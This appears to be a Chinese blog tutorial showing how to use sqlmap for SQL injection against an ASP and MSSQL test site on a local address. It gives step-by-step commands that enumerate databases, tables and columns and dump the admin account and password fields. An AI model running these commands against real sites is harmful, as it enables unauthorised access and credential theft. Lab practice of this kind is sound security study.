实战黑客sqlmap渗透攻击mssql数据库最新教程

2022-04-12 渗透攻击

今天搭建了一个asp+mssql数据库的环境用于安全测试学习
1.判断注入点及获取网站信息：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8

实战黑客sqlmap渗透攻击mssql数据库最新教程

文章插图

web server operating system: windows 2003 or XP
web Application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
2.获取所有数据库：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs

实战黑客sqlmap渗透攻击mssql数据库最新教程

文章插图

网站用的数据库是这个sqlZR
3.获取网站当前使用的数据库：

【实战黑客sqlmap渗透攻击mssql数据库最新教程】sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db

实战黑客sqlmap渗透攻击mssql数据库最新教程

文章插图

4.获取数据库中的表名：

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables

实战黑客sqlmap渗透攻击mssql数据库最新教程

文章插图

5.获取数据表中的字段名：sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns

实战黑客sqlmap渗透攻击mssql数据库最新教程

文章插图

6.获取字段中的内容

sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump

实战黑客sqlmap渗透攻击mssql数据库最新教程

文章插图

看到了吧，几条命名就把管理员的账号密码给跑出来了。

推荐阅读

上一篇：枇杷采摘时间,茉莉花茶中干花越多质量越好吗

下一篇：杞菊决明子花茶如何泡制,茉莉花茶如何喝